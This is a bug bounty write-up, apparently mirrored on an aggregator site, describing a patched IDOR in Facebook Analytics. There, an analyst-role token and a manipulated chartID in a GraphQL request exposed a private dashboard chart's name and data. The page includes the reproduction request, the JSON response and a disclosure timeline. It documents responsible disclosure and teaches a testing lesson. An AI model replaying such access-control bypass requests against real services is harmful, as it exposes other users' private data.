Disclose Private Dashboard Chart's name and data in Facebook Analytics

bugreader.com · devanshbatham/Awesome-Bugbounty-Writeups · 4 hours ago · vulnerability
0 net
AI Summary

An IDOR vulnerability in Facebook Analytics allows users with analyst roles to access private dashboard charts by manipulating the chartID parameter in GraphQL requests, disclosing chart names and data intended only for the dashboard owner. The vulnerability exploits insufficient access control on a sub-option (chart info) within the main dashboard feature.

Tags
idor insecure-direct-object-references authorization-bypass facebook-analytics private-data-disclosure graphql access-control information-disclosure web-vulnerability
Entities
Facebook Sarmad Hassan AnalyticsChartDeleteMutation AnalyticsStoredAggregationChart
Disclose Private Dashboard Chart's name and data in Facebook Analytics | Bugreader Sarmad Hassan Published On: 07 May 2020 Disclose Private Dashboard Chart's name and data in Facebook Analytics IDOR Facebook | Web --- LOW VALID In Facebook Analytics, you can create custom dashboards, which you can view from Dashboards. Use custom dashboards to create a customized view, or to see the information that matters to you most in one place. you can also set "its visibility" by checking on "Private" option check mark, which mean only the owner of this dashboard can see it and its contents. Description It is possible to disclose "Chart name and its Data" for a private dashboard (by any user who have role on the entity or page like analyst role" using an IDOR bug in the parameter called "chartID". Impact Page analyst could view analytics charts where the page admin had set the visibility to "owner only". Reproduction Steps Step 1 POST /graphql?locale=user HTTP/1.1 Host: graph.facebook.com access_token=Analyst_ACCESS_TOKEN&fb_api_req_friendly_name=AnalyticsChartDeleteMutation&variables={"chartID":" admin private chart ID "}&doc_id=1297068037067230 Response: {"data":{"node":{"__typename":"AnalyticsStoredAggregationChart","chartId":" admin private chart ID ","chartType":"BREAKDOWN_TABLE","chartQueries":[{"__typename":"AnalyticsAggregationQuerySpec","aggregationMetric":"UNIQUE_USERS","aggregationMetricParams":[],"aggregationPeriod":"RANGE","breakdowns":["$fb.age"],"dateRange":{" type":"LAST_28_DAYS ","since_iso_date":null,"until_iso_date":null},"displayName":null,"eventName":"fb_pages_post_reaction","orderingColumns":[],"orderingType":"DESCENDING","limit":0,"segment":{"__typename":"AnalyticsAdhocFilterSetListing","name":null,"serializedFilter":"{\"event_rules\":[],\"demographic_rules\":[],\"device_rules\":[],\"percentile_rules\":[],\"user_property_rules\":[],\"web_param_rules\":[]}","filter_json":"{}"},"tag":"CHART"}],"description":"", "title" :" private chart name ","segmentBehavior":"USE_LOCAL","chartAnnotations":[],"errorBounds":[],"goal":null,"id":"id"}},"extensions":{"is_final":true}} My Notes * When it comes to logical bugs like IDOR, always check for Sub-options, because sometimes developers protect only the main option and forget about Sub-option just like in our case here where "Chart info" was the sub-option of the main option "Dashboard" Videos Timeline Sarmad 17 Feb 2020 Initial Report Facebook 26 Feb 2020 Report Triaged Facebook 08 Mar 2020 Report Fixed Sarmad 08 Mar 2020 Fixed Confirmed Facebook 02 Apr 2020 Bounty awarded VALID General Info Introduction Description Impact Steps Step 1 Other Info My Notes Videos Timeline Initial Re ... Report Tri ... Report Fix ... Fixed Conf ... Bounty awa ... Show All Images ×
← Back to stories